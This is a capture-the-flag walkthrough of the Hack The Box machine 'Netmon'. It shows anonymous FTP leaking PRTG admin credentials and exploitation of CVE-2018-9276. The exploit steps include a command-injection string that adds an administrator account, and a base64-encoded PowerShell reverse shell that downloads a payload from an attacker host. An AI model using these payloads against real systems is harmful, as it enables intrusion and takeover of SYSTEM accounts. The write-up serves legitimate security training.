Netmon

Download as pdf or txt
Download as pdf or txt
You are on page 1of 11

 

 
 

 
 

Netmon 
18​th​ May 2019 / Document No D19.100.28 
Prepared By: MinatoTW 
Machine Author: mrb3n 

 
Difficulty: ​Easy  
Classification: Official 

Page 1 / 11 
 

SYNOPSIS 
Netmon  is  an  easy  difficulty  Windows  box  with  simple  enumeration  and  exploitation.  PRTG  is 
running,  and  an  FTP  server  with  anonymous  access  allows  reading  of  PRTG  Network  Monitor 
configuration  files.  The  version  of  PRTG  is  vulnerable  to  RCE  which  can  be  exploited  to  gain  a 
SYSTEM shell. 

Skills Required  Skills Learned 

● Enumeration  ● CVE-2018-9276 

Page 2 / 11 
 

ENUMERATION 

NMAP 
ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.152 | grep ^[0-9] | cut -d
'/'​ -f 1 | tr ​'\n'​ ​','​ | sed s/,$//)
nmap -sC -sV -p​$ports​ 10.10.10.152 
 

 
 
FTP is open with anonymous access allowed. The whole C: drive looks mounted on it. PRTG 
Network Monitor is running on the web server at port 80 among other common ports. 
 
 
 
 
 
 
 
 

Page 3 / 11 
 

FTP 
Logging into FTP as anonymous we find the user flag in Public folder. 

On checking the installed software we find PRTG Network Monitor, which we came across earlier. 

A quick google search yields ​this​ information. According to it PRTG stores configuration files in 
C:\ProgramData\Paessler. 

Page 4 / 11 
 

Going  into  the  folder  we  find  the  configuration  files.  According  to  the  documentation  "PRTG 
Configuration.dat"  and  "PRTG  Configuration.old"  are  standard  files.  However  there’s  no  mention 
of "PRTG Configuration.dat.bak". 

Let’s download and inspect it. 


 

get ​"PRTG Configuration.old.bak" 


 

Page 5 / 11 
 

 
 
Scrolling down a bit we find the password for user prtgadmin. 
 

 
 
PRTG NETWORK MONITOR 
Using the credentials prtgadmin / PrTg@dmin2018 we can now login to the page. 

However the credentials refuse to work. Maybe the password was changed from the old 
configuration. Let’s follow the pattern and try "PrTg@dmin2019" as the password. 

Page 6 / 11 
 

And we’re in as the Administrator. 

Page 7 / 11 
 

FOOTHOLD 

From the page we find the version to be 18.1.37. 

A Google search about the vulnerabilities yields a CVE for versions < 18.1.39 (CVE-2018-9276). 

According to this ​article​, RCE can be achieved while triggering notifications. Let’s try exploiting it. 
The software by default runs as SYSTEM. 

Click on Setup > Account Settings > Notifications. 

Now click on “Add new notification” on the extreme right. 

Page 8 / 11 
 

Leave the default fields as they are and scroll down to the "Execute Program" section. We can 
add a user to Administrators group using this command: 
 

abc.txt | net user htb abc123! /add ; net localgroup administrators htb
/add 

Make the following changes and click “Save”. 

Now on the extreme right of your notification name, click on the edit icon and then the bell icon 
to trigger it. 

Page 9 / 11 
 

Once done, use psexec to login as the created admin user. 

psexec.py htb:​'abc123!'​@10.10.10.152 

And we have a shell as SYSTEM. 

ALTERNATE WAY 

In case we don’t want to add a user, for better OPSEC we can get a reverse shell. However due 
to HTML encoding many characters get encoded. We can bypass this using powershell base64 
execution. 

We need to create a base64 encoded command. However, it should be in the encoding which 
WIndows uses i.e UTF-16LE. 

echo​ -n ​"IEX(new-object
net.webclient).downloadstring('http://10.10.16.32/Invoke-PowerShellTcp.ps1'
)"​ | iconv -t UTF-16LE | base64 -w0 

We use iconv to convert it to target encoding and will execute this ​reverse shell​ from Nishang. 

Download the script and echo in the command to the last line. 

echo​ ​'Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.32 -Port 4444'​ >>


Invoke-PowerShellTcp.ps1 

Page 10 / 11 
 

 
Now start a simple HTTP server and create a new notification. This time the parameter would be, 
 
abc.txt | powershell -enc
SQBFAFgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA
pAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuAD
EAMAAuADEANgAuADMAMgAvAEkAbgB2AG8AawBlAC0AUABvAHcAZQByAFMAaABlAGwAbABUAGMAc
AAuAHAAcwAxACcAKQA= 
 
python3 -m http.server 80 
 
 

 
And trigger it. 
 

 
 
And we have a SYSTEM shell. 

Page 11 / 11 

You might also like